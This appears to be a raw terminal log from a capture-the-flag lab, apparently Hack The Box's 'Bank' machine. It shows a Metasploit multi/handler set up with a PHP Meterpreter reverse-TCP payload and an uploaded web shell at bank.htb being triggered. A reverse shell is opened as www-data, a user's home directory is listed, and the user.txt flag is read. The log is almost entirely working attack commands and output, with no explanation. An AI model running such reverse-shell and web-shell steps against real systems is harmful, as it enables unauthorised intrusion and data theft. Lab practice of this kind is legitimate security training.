
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lhost 10.10.14.19
lhost => 10.10.14.19
msf5 exploit(multi/handler) > set lport 6969
lport => 6969
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.19:6969 







http://bank.htb/uploads/shell.htb









msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.19:6969 
[*] Meterpreter session 1 opened (10.10.14.19:6969 -> 10.129.29.200:57404) at 2021-01-31 21:19:13 +0800

meterpreter > 









meterpreter > getuid
Server username: www-data (33)
meterpreter > 






meterpreter > cd chris
meterpreter > ls
Listing: /home/chris
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
20666/rw-rw-rw-   0     cha   2021-01-31 19:56:54 +0800  .bash_history
100644/rw-r--r--  220   fil   2017-05-29 03:13:11 +0800  .bash_logout
100644/rw-r--r--  3637  fil   2017-05-29 03:13:11 +0800  .bashrc
40700/rwx------   4096  dir   2021-01-11 20:19:00 +0800  .cache
100644/rw-r--r--  675   fil   2017-05-29 03:13:11 +0800  .profile
100444/r--r--r--  33    fil   2021-01-31 19:57:12 +0800  user.txt

meterpreter > cat user.txt
cf7e86220606b30342777eca247d9272
meterpreter > 





